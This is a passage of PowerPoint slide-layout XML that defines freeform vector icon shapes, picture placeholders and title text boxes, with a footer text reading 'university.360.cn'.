                <a:gd name="T81" fmla="*/ 14 h 34"/>
                <a:gd name="T82" fmla="*/ 25 w 32"/>
                <a:gd name="T83" fmla="*/ 22 h 34"/>
                <a:gd name="T84" fmla="*/ 23 w 32"/>
                <a:gd name="T85" fmla="*/ 24 h 34"/>
                <a:gd name="T86" fmla="*/ 17 w 32"/>
                <a:gd name="T87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" h="34">
                  <a:moveTo>
                    <a:pt x="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4" y="4"/>
                    <a:pt x="5" y="2"/>
                    <a:pt x="5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3"/>
                    <a:pt x="7" y="4"/>
                    <a:pt x="6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6"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10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0" y="17"/>
                    <a:pt x="10" y="17"/>
                    <a:pt x="10" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10" y="9"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2" y="28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2" y="20"/>
                    <a:pt x="2" y="20"/>
                    <a:pt x="2" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="14" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="10"/>
                    <a:pt x="18" y="5"/>
                    <a:pt x="19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3"/>
                    <a:pt x="21" y="4"/>
                    <a:pt x="20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18"/>
                    <a:pt x="31" y="25"/>
                    <a:pt x="31" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="32"/>
                    <a:pt x="29" y="34"/>
                    <a:pt x="25" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="34"/>
                    <a:pt x="21" y="34"/>
                    <a:pt x="19" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="33"/>
                    <a:pt x="18" y="32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21" y="31"/>
                    <a:pt x="23" y="31"/>
                    <a:pt x="25" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="31"/>
                    <a:pt x="28" y="30"/>
                    <a:pt x="28" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="24"/>
                    <a:pt x="29" y="18"/>
                    <a:pt x="2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11"/>
                    <a:pt x="17" y="13"/>
                    <a:pt x="16" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="14"/>
                    <a:pt x="15" y="14"/>
                    <a:pt x="14" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="15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22" y="17"/>
                    <a:pt x="24" y="20"/>
                    <a:pt x="25" y="22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1" y="21"/>
                    <a:pt x="19" y="18"/>
                    <a:pt x="1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8" name="Freeform 24"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8292644" y="-265661"/>
              <a:ext cx="58415" cy="57636"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 10 w 35"/>
                <a:gd name="T1" fmla="*/ 0 h 34"/>
                <a:gd name="T2" fmla="*/ 10 w 35"/>
                <a:gd name="T3" fmla="*/ 1 h 34"/>
                <a:gd name="T4" fmla="*/ 16 w 35"/>
                <a:gd name="T5" fmla="*/ 9 h 34"/>
                <a:gd name="T6" fmla="*/ 14 w 35"/>
                <a:gd name="T7" fmla="*/ 11 h 34"/>
                <a:gd name="T8" fmla="*/ 9 w 35"/>
                <a:gd name="T9" fmla="*/ 3 h 34"/>
                <a:gd name="T10" fmla="*/ 2 w 35"/>
                <a:gd name="T11" fmla="*/ 15 h 34"/>
                <a:gd name="T12" fmla="*/ 0 w 35"/>
                <a:gd name="T13" fmla="*/ 12 h 34"/>
                <a:gd name="T14" fmla="*/ 8 w 35"/>
                <a:gd name="T15" fmla="*/ 0 h 34"/>
                <a:gd name="T16" fmla="*/ 10 w 35"/>
                <a:gd name="T17" fmla="*/ 0 h 34"/>
                <a:gd name="T18" fmla="*/ 3 w 35"/>
                <a:gd name="T19" fmla="*/ 24 h 34"/>
                <a:gd name="T20" fmla="*/ 5 w 35"/>
                <a:gd name="T21" fmla="*/ 22 h 34"/>
                <a:gd name="T22" fmla="*/ 8 w 35"/>
                <a:gd name="T23" fmla="*/ 26 h 34"/>
                <a:gd name="T24" fmla="*/ 12 w 35"/>
                <a:gd name="T25" fmla="*/ 18 h 34"/>
                <a:gd name="T26" fmla="*/ 2 w 35"/>
                <a:gd name="T27" fmla="*/ 18 h 34"/>
                <a:gd name="T28" fmla="*/ 2 w 35"/>
                <a:gd name="T29" fmla="*/ 16 h 34"/>
                <a:gd name="T30" fmla="*/ 15 w 35"/>
                <a:gd name="T31" fmla="*/ 16 h 34"/>
                <a:gd name="T32" fmla="*/ 15 w 35"/>
                <a:gd name="T33" fmla="*/ 18 h 34"/>
                <a:gd name="T34" fmla="*/ 10 w 35"/>
                <a:gd name="T35" fmla="*/ 28 h 34"/>
                <a:gd name="T36" fmla="*/ 13 w 35"/>
                <a:gd name="T37" fmla="*/ 32 h 34"/>
                <a:gd name="T38" fmla="*/ 10 w 35"/>
                <a:gd name="T39" fmla="*/ 33 h 34"/>
                <a:gd name="T40" fmla="*/ 3 w 35"/>
                <a:gd name="T41" fmla="*/ 24 h 34"/>
                <a:gd name="T42" fmla="*/ 7 w 35"/>
                <a:gd name="T43" fmla="*/ 9 h 34"/>
                <a:gd name="T44" fmla="*/ 9 w 35"/>
                <a:gd name="T45" fmla="*/ 8 h 34"/>
                <a:gd name="T46" fmla="*/ 12 w 35"/>
                <a:gd name="T47" fmla="*/ 13 h 34"/>
                <a:gd name="T48" fmla="*/ 9 w 35"/>
                <a:gd name="T49" fmla="*/ 15 h 34"/>
                <a:gd name="T50" fmla="*/ 7 w 35"/>
                <a:gd name="T51" fmla="*/ 9 h 34"/>
                <a:gd name="T52" fmla="*/ 24 w 35"/>
                <a:gd name="T53" fmla="*/ 12 h 34"/>
                <a:gd name="T54" fmla="*/ 27 w 35"/>
                <a:gd name="T55" fmla="*/ 12 h 34"/>
                <a:gd name="T56" fmla="*/ 27 w 35"/>
                <a:gd name="T57" fmla="*/ 17 h 34"/>
                <a:gd name="T58" fmla="*/ 26 w 35"/>
                <a:gd name="T59" fmla="*/ 24 h 34"/>
                <a:gd name="T60" fmla="*/ 35 w 35"/>
                <a:gd name="T61" fmla="*/ 32 h 34"/>
                <a:gd name="T62" fmla="*/ 33 w 35"/>
                <a:gd name="T63" fmla="*/ 34 h 34"/>
                <a:gd name="T64" fmla="*/ 25 w 35"/>
                <a:gd name="T65" fmla="*/ 26 h 34"/>
                <a:gd name="T66" fmla="*/ 24 w 35"/>
                <a:gd name="T67" fmla="*/ 27 h 34"/>
                <a:gd name="T68" fmla="*/ 16 w 35"/>
                <a:gd name="T69" fmla="*/ 34 h 34"/>
                <a:gd name="T70" fmla="*/ 14 w 35"/>
                <a:gd name="T71" fmla="*/ 32 h 34"/>
                <a:gd name="T72" fmla="*/ 22 w 35"/>
                <a:gd name="T73" fmla="*/ 26 h 34"/>
                <a:gd name="T74" fmla="*/ 24 w 35"/>
                <a:gd name="T75" fmla="*/ 17 h 34"/>
                <a:gd name="T76" fmla="*/ 24 w 35"/>
                <a:gd name="T77" fmla="*/ 12 h 34"/>
                <a:gd name="T78" fmla="*/ 17 w 35"/>
                <a:gd name="T79" fmla="*/ 8 h 34"/>
                <a:gd name="T80" fmla="*/ 23 w 35"/>
                <a:gd name="T81" fmla="*/ 8 h 34"/>
                <a:gd name="T82" fmla="*/ 24 w 35"/>
                <a:gd name="T83" fmla="*/ 3 h 34"/>
                <a:gd name="T84" fmla="*/ 15 w 35"/>
                <a:gd name="T85" fmla="*/ 3 h 34"/>
                <a:gd name="T86" fmla="*/ 15 w 35"/>
                <a:gd name="T87" fmla="*/ 1 h 34"/>
                <a:gd name="T88" fmla="*/ 35 w 35"/>
                <a:gd name="T89" fmla="*/ 1 h 34"/>
                <a:gd name="T90" fmla="*/ 35 w 35"/>
                <a:gd name="T91" fmla="*/ 3 h 34"/>
                <a:gd name="T92" fmla="*/ 27 w 35"/>
                <a:gd name="T93" fmla="*/ 3 h 34"/>
                <a:gd name="T94" fmla="*/ 26 w 35"/>
                <a:gd name="T95" fmla="*/ 8 h 34"/>
                <a:gd name="T96" fmla="*/ 34 w 35"/>
                <a:gd name="T97" fmla="*/ 8 h 34"/>
                <a:gd name="T98" fmla="*/ 34 w 35"/>
                <a:gd name="T99" fmla="*/ 25 h 34"/>
                <a:gd name="T100" fmla="*/ 31 w 35"/>
                <a:gd name="T101" fmla="*/ 25 h 34"/>
                <a:gd name="T102" fmla="*/ 31 w 35"/>
                <a:gd name="T103" fmla="*/ 11 h 34"/>
                <a:gd name="T104" fmla="*/ 19 w 35"/>
                <a:gd name="T105" fmla="*/ 11 h 34"/>
                <a:gd name="T106" fmla="*/ 19 w 35"/>
                <a:gd name="T107" fmla="*/ 25 h 34"/>
                <a:gd name="T108" fmla="*/ 17 w 35"/>
                <a:gd name="T109" fmla="*/ 25 h 34"/>
                <a:gd name="T110" fmla="*/ 17 w 35"/>
                <a:gd name="T111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" h="34">
                  <a:moveTo>
                    <a:pt x="10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2" y="3"/>
                    <a:pt x="14" y="6"/>
                    <a:pt x="16" y="9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8"/>
                    <a:pt x="11" y="5"/>
                    <a:pt x="9" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="7"/>
                    <a:pt x="5" y="11"/>
                    <a:pt x="2" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="14"/>
                    <a:pt x="1" y="13"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="9"/>
                    <a:pt x="6" y="5"/>
                    <a:pt x="8" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3" y="24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6" y="24"/>
                    <a:pt x="7" y="25"/>
                    <a:pt x="8" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="24"/>
                    <a:pt x="11" y="21"/>
                    <a:pt x="1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22"/>
                    <a:pt x="11" y="26"/>
                    <a:pt x="10" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="29"/>
                    <a:pt x="12" y="31"/>
                    <a:pt x="13" y="32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8" y="30"/>
                    <a:pt x="5" y="27"/>
                    <a:pt x="3" y="24"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="7" y="9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10"/>
                    <a:pt x="11" y="12"/>
                    <a:pt x="12" y="13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3"/>
                    <a:pt x="8" y="11"/>
                    <a:pt x="7" y="9"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="24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20"/>
                    <a:pt x="26" y="22"/>
                    <a:pt x="26" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="26"/>
                    <a:pt x="32" y="29"/>
                    <a:pt x="35" y="3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1" y="31"/>
                    <a:pt x="28" y="29"/>
                    <a:pt x="25" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="27"/>
                    <a:pt x="24" y="27"/>
                    <a:pt x="24" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="30"/>
                    <a:pt x="20" y="32"/>
                    <a:pt x="16" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="33"/>
                    <a:pt x="14" y="32"/>
                    <a:pt x="14" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="30"/>
                    <a:pt x="20" y="28"/>
                    <a:pt x="22" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="24"/>
                    <a:pt x="24" y="21"/>
                    <a:pt x="24" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="12"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="8"/>
                    <a:pt x="23" y="8"/>
                    <a:pt x="23" y="8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7" y="25"/>
                    <a:pt x="17" y="25"/>
                    <a:pt x="17" y="25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9" name="Freeform 25"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8409473" y="-264103"/>
              <a:ext cx="58415" cy="54520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 35"/>
                <a:gd name="T1" fmla="*/ 20 h 32"/>
                <a:gd name="T2" fmla="*/ 24 w 35"/>
                <a:gd name="T3" fmla="*/ 20 h 32"/>
                <a:gd name="T4" fmla="*/ 24 w 35"/>
                <a:gd name="T5" fmla="*/ 17 h 32"/>
                <a:gd name="T6" fmla="*/ 27 w 35"/>
                <a:gd name="T7" fmla="*/ 17 h 32"/>
                <a:gd name="T8" fmla="*/ 27 w 35"/>
                <a:gd name="T9" fmla="*/ 20 h 32"/>
                <a:gd name="T10" fmla="*/ 35 w 35"/>
                <a:gd name="T11" fmla="*/ 20 h 32"/>
                <a:gd name="T12" fmla="*/ 35 w 35"/>
                <a:gd name="T13" fmla="*/ 22 h 32"/>
                <a:gd name="T14" fmla="*/ 27 w 35"/>
                <a:gd name="T15" fmla="*/ 22 h 32"/>
                <a:gd name="T16" fmla="*/ 27 w 35"/>
                <a:gd name="T17" fmla="*/ 28 h 32"/>
                <a:gd name="T18" fmla="*/ 23 w 35"/>
                <a:gd name="T19" fmla="*/ 32 h 32"/>
                <a:gd name="T20" fmla="*/ 17 w 35"/>
                <a:gd name="T21" fmla="*/ 32 h 32"/>
                <a:gd name="T22" fmla="*/ 17 w 35"/>
                <a:gd name="T23" fmla="*/ 29 h 32"/>
                <a:gd name="T24" fmla="*/ 22 w 35"/>
                <a:gd name="T25" fmla="*/ 29 h 32"/>
                <a:gd name="T26" fmla="*/ 24 w 35"/>
                <a:gd name="T27" fmla="*/ 27 h 32"/>
                <a:gd name="T28" fmla="*/ 24 w 35"/>
                <a:gd name="T29" fmla="*/ 22 h 32"/>
                <a:gd name="T30" fmla="*/ 0 w 35"/>
                <a:gd name="T31" fmla="*/ 22 h 32"/>
                <a:gd name="T32" fmla="*/ 0 w 35"/>
                <a:gd name="T33" fmla="*/ 20 h 32"/>
                <a:gd name="T34" fmla="*/ 9 w 35"/>
                <a:gd name="T35" fmla="*/ 14 h 32"/>
                <a:gd name="T36" fmla="*/ 28 w 35"/>
                <a:gd name="T37" fmla="*/ 14 h 32"/>
                <a:gd name="T38" fmla="*/ 31 w 35"/>
                <a:gd name="T39" fmla="*/ 12 h 32"/>
                <a:gd name="T40" fmla="*/ 32 w 35"/>
                <a:gd name="T41" fmla="*/ 8 h 32"/>
                <a:gd name="T42" fmla="*/ 34 w 35"/>
                <a:gd name="T43" fmla="*/ 9 h 32"/>
                <a:gd name="T44" fmla="*/ 33 w 35"/>
                <a:gd name="T45" fmla="*/ 13 h 32"/>
                <a:gd name="T46" fmla="*/ 28 w 35"/>
                <a:gd name="T47" fmla="*/ 16 h 32"/>
                <a:gd name="T48" fmla="*/ 9 w 35"/>
                <a:gd name="T49" fmla="*/ 16 h 32"/>
                <a:gd name="T50" fmla="*/ 4 w 35"/>
                <a:gd name="T51" fmla="*/ 12 h 32"/>
                <a:gd name="T52" fmla="*/ 4 w 35"/>
                <a:gd name="T53" fmla="*/ 0 h 32"/>
                <a:gd name="T54" fmla="*/ 29 w 35"/>
                <a:gd name="T55" fmla="*/ 0 h 32"/>
                <a:gd name="T56" fmla="*/ 29 w 35"/>
                <a:gd name="T57" fmla="*/ 10 h 32"/>
                <a:gd name="T58" fmla="*/ 26 w 35"/>
                <a:gd name="T59" fmla="*/ 10 h 32"/>
                <a:gd name="T60" fmla="*/ 26 w 35"/>
                <a:gd name="T61" fmla="*/ 9 h 32"/>
                <a:gd name="T62" fmla="*/ 7 w 35"/>
                <a:gd name="T63" fmla="*/ 9 h 32"/>
                <a:gd name="T64" fmla="*/ 7 w 35"/>
                <a:gd name="T65" fmla="*/ 11 h 32"/>
                <a:gd name="T66" fmla="*/ 9 w 35"/>
                <a:gd name="T67" fmla="*/ 14 h 32"/>
                <a:gd name="T68" fmla="*/ 6 w 35"/>
                <a:gd name="T69" fmla="*/ 24 h 32"/>
                <a:gd name="T70" fmla="*/ 8 w 35"/>
                <a:gd name="T71" fmla="*/ 22 h 32"/>
                <a:gd name="T72" fmla="*/ 14 w 35"/>
                <a:gd name="T73" fmla="*/ 27 h 32"/>
                <a:gd name="T74" fmla="*/ 12 w 35"/>
                <a:gd name="T75" fmla="*/ 29 h 32"/>
                <a:gd name="T76" fmla="*/ 6 w 35"/>
                <a:gd name="T77" fmla="*/ 24 h 32"/>
                <a:gd name="T78" fmla="*/ 7 w 35"/>
                <a:gd name="T79" fmla="*/ 2 h 32"/>
                <a:gd name="T80" fmla="*/ 7 w 35"/>
                <a:gd name="T81" fmla="*/ 7 h 32"/>
                <a:gd name="T82" fmla="*/ 26 w 35"/>
                <a:gd name="T83" fmla="*/ 7 h 32"/>
                <a:gd name="T84" fmla="*/ 26 w 35"/>
                <a:gd name="T85" fmla="*/ 2 h 32"/>
                <a:gd name="T86" fmla="*/ 7 w 35"/>
                <a:gd name="T8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" h="32">
                  <a:moveTo>
                    <a:pt x="0" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="20"/>
                    <a:pt x="24" y="20"/>
                    <a:pt x="24" y="20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31"/>
                    <a:pt x="26" y="32"/>
                    <a:pt x="23" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="32"/>
                    <a:pt x="20" y="32"/>
                    <a:pt x="17" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="31"/>
                    <a:pt x="17" y="30"/>
                    <a:pt x="17" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="29"/>
                    <a:pt x="20" y="29"/>
                    <a:pt x="22" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="29"/>
                    <a:pt x="24" y="29"/>
                    <a:pt x="24" y="27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0" y="20"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9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9" y="14"/>
                    <a:pt x="31" y="13"/>
                    <a:pt x="31" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="11"/>
                    <a:pt x="31" y="10"/>
                    <a:pt x="32" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="8"/>
                    <a:pt x="33" y="9"/>
                    <a:pt x="34" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="11"/>
                    <a:pt x="34" y="12"/>
                    <a:pt x="33" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="15"/>
                    <a:pt x="31" y="16"/>
                    <a:pt x="2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5" y="16"/>
                    <a:pt x="4" y="15"/>
                    <a:pt x="4" y="1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4"/>
                    <a:pt x="9" y="14"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="6" y="24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11" y="24"/>
                    <a:pt x="13" y="26"/>
                    <a:pt x="14" y="27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0" y="27"/>
                    <a:pt x="8" y="25"/>
                    <a:pt x="6" y="24"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="7" y="2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2"/>
                    <a:pt x="26" y="2"/>
                    <a:pt x="26" y="2"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="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0" name="Freeform 26"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8523964" y="-267218"/>
              <a:ext cx="58415" cy="59193"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 35"/>
                <a:gd name="T1" fmla="*/ 11 h 35"/>
                <a:gd name="T2" fmla="*/ 14 w 35"/>
                <a:gd name="T3" fmla="*/ 11 h 35"/>
                <a:gd name="T4" fmla="*/ 14 w 35"/>
                <a:gd name="T5" fmla="*/ 7 h 35"/>
                <a:gd name="T6" fmla="*/ 4 w 35"/>
                <a:gd name="T7" fmla="*/ 7 h 35"/>
                <a:gd name="T8" fmla="*/ 4 w 35"/>
                <a:gd name="T9" fmla="*/ 5 h 35"/>
                <a:gd name="T10" fmla="*/ 14 w 35"/>
                <a:gd name="T11" fmla="*/ 5 h 35"/>
                <a:gd name="T12" fmla="*/ 14 w 35"/>
                <a:gd name="T13" fmla="*/ 0 h 35"/>
                <a:gd name="T14" fmla="*/ 17 w 35"/>
                <a:gd name="T15" fmla="*/ 0 h 35"/>
                <a:gd name="T16" fmla="*/ 17 w 35"/>
                <a:gd name="T17" fmla="*/ 5 h 35"/>
                <a:gd name="T18" fmla="*/ 26 w 35"/>
                <a:gd name="T19" fmla="*/ 5 h 35"/>
                <a:gd name="T20" fmla="*/ 26 w 35"/>
                <a:gd name="T21" fmla="*/ 7 h 35"/>
                <a:gd name="T22" fmla="*/ 17 w 35"/>
                <a:gd name="T23" fmla="*/ 7 h 35"/>
                <a:gd name="T24" fmla="*/ 17 w 35"/>
                <a:gd name="T25" fmla="*/ 11 h 35"/>
                <a:gd name="T26" fmla="*/ 20 w 35"/>
                <a:gd name="T27" fmla="*/ 11 h 35"/>
                <a:gd name="T28" fmla="*/ 30 w 35"/>
                <a:gd name="T29" fmla="*/ 2 h 35"/>
                <a:gd name="T30" fmla="*/ 32 w 35"/>
                <a:gd name="T31" fmla="*/ 4 h 35"/>
                <a:gd name="T32" fmla="*/ 25 w 35"/>
                <a:gd name="T33" fmla="*/ 11 h 35"/>
                <a:gd name="T34" fmla="*/ 35 w 35"/>
                <a:gd name="T35" fmla="*/ 11 h 35"/>
                <a:gd name="T36" fmla="*/ 35 w 35"/>
                <a:gd name="T37" fmla="*/ 14 h 35"/>
                <a:gd name="T38" fmla="*/ 22 w 35"/>
                <a:gd name="T39" fmla="*/ 14 h 35"/>
                <a:gd name="T40" fmla="*/ 15 w 35"/>
                <a:gd name="T41" fmla="*/ 18 h 35"/>
                <a:gd name="T42" fmla="*/ 29 w 35"/>
                <a:gd name="T43" fmla="*/ 18 h 35"/>
                <a:gd name="T44" fmla="*/ 29 w 35"/>
                <a:gd name="T45" fmla="*/ 35 h 35"/>
                <a:gd name="T46" fmla="*/ 26 w 35"/>
                <a:gd name="T47" fmla="*/ 35 h 35"/>
                <a:gd name="T48" fmla="*/ 26 w 35"/>
                <a:gd name="T49" fmla="*/ 33 h 35"/>
                <a:gd name="T50" fmla="*/ 10 w 35"/>
                <a:gd name="T51" fmla="*/ 33 h 35"/>
                <a:gd name="T52" fmla="*/ 10 w 35"/>
                <a:gd name="T53" fmla="*/ 35 h 35"/>
                <a:gd name="T54" fmla="*/ 7 w 35"/>
                <a:gd name="T55" fmla="*/ 35 h 35"/>
                <a:gd name="T56" fmla="*/ 7 w 35"/>
                <a:gd name="T57" fmla="*/ 22 h 35"/>
                <a:gd name="T58" fmla="*/ 1 w 35"/>
                <a:gd name="T59" fmla="*/ 24 h 35"/>
                <a:gd name="T60" fmla="*/ 0 w 35"/>
                <a:gd name="T61" fmla="*/ 21 h 35"/>
                <a:gd name="T62" fmla="*/ 17 w 35"/>
                <a:gd name="T63" fmla="*/ 14 h 35"/>
                <a:gd name="T64" fmla="*/ 1 w 35"/>
                <a:gd name="T65" fmla="*/ 14 h 35"/>
                <a:gd name="T66" fmla="*/ 1 w 35"/>
                <a:gd name="T67" fmla="*/ 11 h 35"/>
                <a:gd name="T68" fmla="*/ 10 w 35"/>
                <a:gd name="T69" fmla="*/ 20 h 35"/>
                <a:gd name="T70" fmla="*/ 10 w 35"/>
                <a:gd name="T71" fmla="*/ 24 h 35"/>
                <a:gd name="T72" fmla="*/ 26 w 35"/>
                <a:gd name="T73" fmla="*/ 24 h 35"/>
                <a:gd name="T74" fmla="*/ 26 w 35"/>
                <a:gd name="T75" fmla="*/ 20 h 35"/>
                <a:gd name="T76" fmla="*/ 11 w 35"/>
                <a:gd name="T77" fmla="*/ 20 h 35"/>
                <a:gd name="T78" fmla="*/ 10 w 35"/>
                <a:gd name="T79" fmla="*/ 20 h 35"/>
                <a:gd name="T80" fmla="*/ 10 w 35"/>
                <a:gd name="T81" fmla="*/ 30 h 35"/>
                <a:gd name="T82" fmla="*/ 26 w 35"/>
                <a:gd name="T83" fmla="*/ 30 h 35"/>
                <a:gd name="T84" fmla="*/ 26 w 35"/>
                <a:gd name="T85" fmla="*/ 26 h 35"/>
                <a:gd name="T86" fmla="*/ 10 w 35"/>
                <a:gd name="T87" fmla="*/ 26 h 35"/>
                <a:gd name="T88" fmla="*/ 10 w 35"/>
                <a:gd name="T8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5" h="35">
                  <a:moveTo>
                    <a:pt x="1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4" y="9"/>
                    <a:pt x="27" y="6"/>
                    <a:pt x="30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0" y="7"/>
                    <a:pt x="28" y="9"/>
                    <a:pt x="2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0" y="15"/>
                    <a:pt x="18" y="16"/>
                    <a:pt x="15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2"/>
                    <a:pt x="4" y="23"/>
                    <a:pt x="1" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="23"/>
                    <a:pt x="1" y="22"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="12" y="17"/>
                    <a:pt x="17" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="14"/>
                    <a:pt x="1" y="14"/>
                    <a:pt x="1" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="11"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="20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0" y="20"/>
                    <a:pt x="10" y="20"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="30"/>
                    <a:pt x="26" y="30"/>
                    <a:pt x="26" y="3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10" y="26"/>
                    <a:pt x="10" y="26"/>
                    <a:pt x="10" y="26"/>
                  </a:cubicBez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1" descr="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="50028" b="13495"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-812800" y="2149475"/>
            <a:ext cx="4159885" cy="33902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" name="图片 10" descr="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect b="3900"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="961389" y="3518093"/>
            <a:ext cx="10433686" cy="36607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片 9" descr="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect t="6678" b="1167"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4766945" y="-391160"/>
            <a:ext cx="7797801" cy="33559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" name="标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196340" y="6416675"/>
            <a:ext cx="9799320" cy="359411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 anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr spc="2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dirty="0"/>
              <a:t>university.360.cn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1" y="550734"/>
            <a:ext cx="1585452" cy="63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567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9523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8" descr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69" y="6369050"/>
            <a:ext cx="11304001" cy="770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标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196340" y="6463579"/>
            <a:ext cx="9799320" cy="359411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 anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
